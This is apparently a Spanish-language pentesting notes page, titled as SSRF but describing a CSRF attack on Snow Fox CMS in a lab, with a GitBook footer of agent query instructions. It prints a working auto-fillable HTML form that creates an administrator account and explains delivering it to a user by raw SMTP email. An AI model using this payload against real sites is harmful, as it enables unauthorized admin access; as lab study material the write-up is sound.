> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/web-vulnerabilities/owasp-top-10-vulnerabilities/vulnerability-server-side-request-forgery-ssrf/ssrf-email-pentesting-web.md).

# SSRF correo electrónico

## CSRF:

Busque en SearchExploit el CMS Snow Fox, que revela una vulnerabilidad CSRF.

<figure><img src="/files/141fb9fb995eaf26e5297f17a56f038754abda43" alt=""><figcaption></figcaption></figure>

**Archivo HTML vulnerable:**

```html
<html>
  <body>
    <form action="http://casino-royale.local/vip-clinkt-portfolios/?uri=admin/accounts/create" method="POST">
      <input type="hidden" name="emailAddress" value="jordan@jordan.com" />
      <input type="hidden" name="verifiedEmail" value="verificado" />
      <input type="hidden" name="username" value="jordan-admin" />
      <input type="hidden" name="newPassword" value="jordan-password" />
      <input type="hidden" name="confirmPassword" value="jordan-password" />
      <input type="hidden" name="userGroups[]" value="34" />
      <input type="hidden" name="userGroups[]" value="33" />
      <input type="hidden" name="memo" value="CSRFmemo" />
      <input type="hidden" name="status" value="1" />
      <input type="hidden" name="formAction" value="submit" />
      <input type="submit" value="Enviar formulario" />
    </form>
  </body>
</html>

```

Intento de ataque [CSRF](/es/web-vulnerabilities/owasp-top-10-vulnerabilities/vulnerability-cross-site-request-forgery-csrf.md) ataque para crear una cuenta de administrador a través de Snow Fox CMS

* Conéctese mediante telnand en el puerto SMTP 25.

<figure><img src="/files/302ab47b52f833dff0a393727131cc3956a52e18" alt=""><figcaption></figcaption></figure>

* Envíe un correo electrónico a "<valenka@casino-royale.local>" con los enlaces de nuestro servidor Python3 HTTP con el archivo HTML vulnerable.

<figure><img src="/files/6ee78f2e3106d016f3a7423f1a73242e69b2638f" alt=""><figcaption></figcaption></figure>

**Conexión con la cuenta de administrador del CMS:**

* Intento de inicio de sesión con las nuevas credenciales, que resulta en la creación de una cuenta de administrador en Snow Fox CMS.

<figure><img src="/files/edb001ef4ee62e7173f2f26a2b46eeb485b5ec49" alt=""><figcaption></figcaption></figure>

#### Después de explotar la vulnerabilidad CSRF, se crea una cuenta de administrador en Snow Fox CMS.

<figure><img src="/files/79dbe3bc409540689f43231bc6b1dd822155ed41" alt=""><figcaption></figcaption></figure>

#### Identificación de una pista en la descripción de un usuario

En la descripción del usuario del CMS, una pista adicional indica un directorio a seguir.

<figure><img src="/files/f904bee4677a6ef0af83b7a788dba20d7aadb6e1" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/web-vulnerabilities/owasp-top-10-vulnerabilities/vulnerability-server-side-request-forgery-ssrf/ssrf-email-pentesting-web.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
